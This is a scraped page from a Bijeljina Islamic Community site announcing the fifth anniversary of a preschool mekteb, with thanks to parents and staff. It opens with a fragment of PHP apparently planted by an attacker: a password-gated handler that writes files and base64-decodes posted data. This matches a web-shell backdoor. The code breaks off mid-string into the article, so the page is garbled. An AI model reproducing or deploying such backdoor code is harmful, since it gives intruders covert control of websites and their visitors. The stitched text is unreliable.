function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Mekteb za predškolski uzrast Bijeljina danas obilježava petu godišnjicu rada (FOTO) - Medžlis Islamske zajednice Bijeljina

Mekteb za predškolski uzrast Bijeljina danas obilježava petu godišnjicu rada (FOTO)

Mekteb za predškolski uzrast Bijeljina danas obilježava petu godišnjicu rada (FOTO)

Mekteb je riječ arapskog porijekla, a označava mjesto gdje se piše i uči. Mektebski centar izgradjen je 2008. godine, a odjeljenje za predškolski uzrast osnovano je 19.4.2015. godine.

Mekteb za predškolski uzrast rezultat je dugogodišnje potrebe i želje da našim najmladjima pružimo mjesto gdje mogu kvalitetno provesti svoje vrijeme uz igru i razne učeće, praktične i kreativne aktivnosti. Predškolski uzrast je “zlatno doba” u odrastanju svakog djeteta i u tom periodu najviše možemo uticati na dijete i usmjeriti ga ka istinskim vrijednostima u životu koje u današnjem vremenu devalviraju.


U Mektebu za predškolski uzrast djeca imaju mogućnost da obrađuju razne teme iz oblasti prirode, jezika, početnih pojmova matematike, razvijaju svoje sposobnosti i vještine, uče o pravilima ponašanja koje zagovaraju naša vjera i tradicija. Također, djeci je na raspolaganju i mektebska igraonica sa svim potrebnim elementima za igru gdje djeca najviše vole da provode vrijeme tokom toplijih dana.


Veliku zahvalnost i podršku dugujemo našim roditeljima, koji su nam ukazali svoje povjerenje. Osim što redovno dovode djecu u Mekteb za predškolski uzrast, učestvuju i u različitim radionicama i pomažu nam tokom pripreme djece za priredbe. Zahvaljujemo se roditeljima koji čak i u ovim vanrednim okolnostima pružaju nam svoju podršku i saradnju i redovno sa djecom obavljaju zadatke koje im šaljemo.


Ovo je mali jubilej, ali značajan. Hvala svima onima koji pomažu i učestvuju u radu Mekteba za predškolski uzrast na bilo koji način.


Mi ćemo se i dalje truditi, bez obzira na sve, da naš rad učinimo još boljim i kvalitetnijim, u boljim vremenima, ako Bog da.


Neka je blagoslovljen i radostan ovaj dan, uz molbu Svemilosnom da sve druge rođendane Mekteba za predškolski uzrast obilježimo u boljim vremenima bez pandemije, da obilježimo svečanom priredbom sa mnogo musafira kako je bilo planirano krajem marta ove godine.


Čuvajmo svoje zdravlje i neka nas čuva Dragi Bog.

 

Pedagoški tim Mekteba za predškolski uzrast Bijeljina

 

UŽIVAJTE U GALERIJI FOTOGRAFIJA!